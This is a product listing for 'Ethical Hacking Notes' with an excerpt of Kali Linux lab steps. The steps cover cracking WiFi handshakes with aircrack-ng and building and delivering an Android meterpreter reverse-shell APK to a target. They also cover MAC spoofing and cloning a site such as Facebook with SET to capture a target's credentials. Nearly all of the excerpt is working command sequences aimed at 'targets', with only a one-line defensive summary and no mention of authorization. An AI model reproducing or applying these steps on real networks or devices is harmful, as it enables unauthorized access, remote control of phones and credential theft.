Ethical Hacking Notes
  • Ethical Hacking Notes

About the Product

Ethical Hacking Notes (Grade A+)

Summary:

To recover lost information, especially in case you lost your password. To perform penetration testing to strengthen computer and network security. To put adequate preventative measures in place to prevent security breaches. To have a computer system that prevents malicious hackers from gaining access.

Excerpt:

Ethical Hacking Notes

Experiment 1: Hacking WiFi Password Using Kali Linux Commands:

  1. Iwconfig
  2. Airmon-ng check kill
  3. airmon-ng start wlan0
  4. ifconfig [interface of wireless card] down
  5. airodump-ng [monitor interface] (usually mon0)
  6. airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
  7. aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
  8. Observe aireplay-ng sending the packets.
  9. Handshake MAC address will be displayed.
  10. aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Experiment 2: Hacking Mobile Phone Features Commands:

  1. Open Kali terminal.
  2. msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/itechhacks.apk
  3. Modify LHOST to your local IP.
  4. Transfer itechhacks.apk to the target.
  5. Open a new terminal: msfconsole
  6. use exploit/multi/handler
  7. set payload android/meterpreter/reverse_tcp
  8. set lhost 172.16.27.207
  9. set lport 8888
  10. exploit
  11. Keep the terminal open and wait for the target to open the file.
  12. Access the session using session -i 1.

Experiment 3: Changing MAC Address Commands:

  1. ifconfig | grep HWaddr
  2. ifconfig eth0 down
  3. ifconfig eth0 hw ether 00:00:00:00:00:02
  4. ifconfig eth0 up
  5. Check the MAC address to verify the change.
  6. Edit /etc/network/interfaces using a text editor: pico /etc/network/interfaces
  7. Add script to modify MAC address permanently.

Experiment 4: Changing IP Address Commands:

  1. Check current IP.
  2. Download the required file from the VPN book.
  3. Navigate to Desktop: cd Desktop
  4. Open directory: cd vpnbook
  5. Install required packages: apt-get install vpnbook & apt-get install openvpn
  6. Start OpenVPN: openvpn vpnbook-cal-tcp80.ovpn

Experiment 5: Cloning a Website Using Kali Linux Commands:

  1. Check broadcast IP.
  2. Ping the target IP.
  3. Start SET Toolkit: Setoolkit
  4. Choose “social engineering attacks”.
  5. Choose “Website Attack Vectors”.
  6. Select “Web Jacking Attack Method”.
  7. Choose “Site Cloner”.
  8. Provide IP address (Kali Linux machine IP).
  9. Enter the URL of the website to clone (e.g., Facebook).
  10. Send cloned website link to Target.
  11. Obtain target credentials from Kali Linux at specified locations.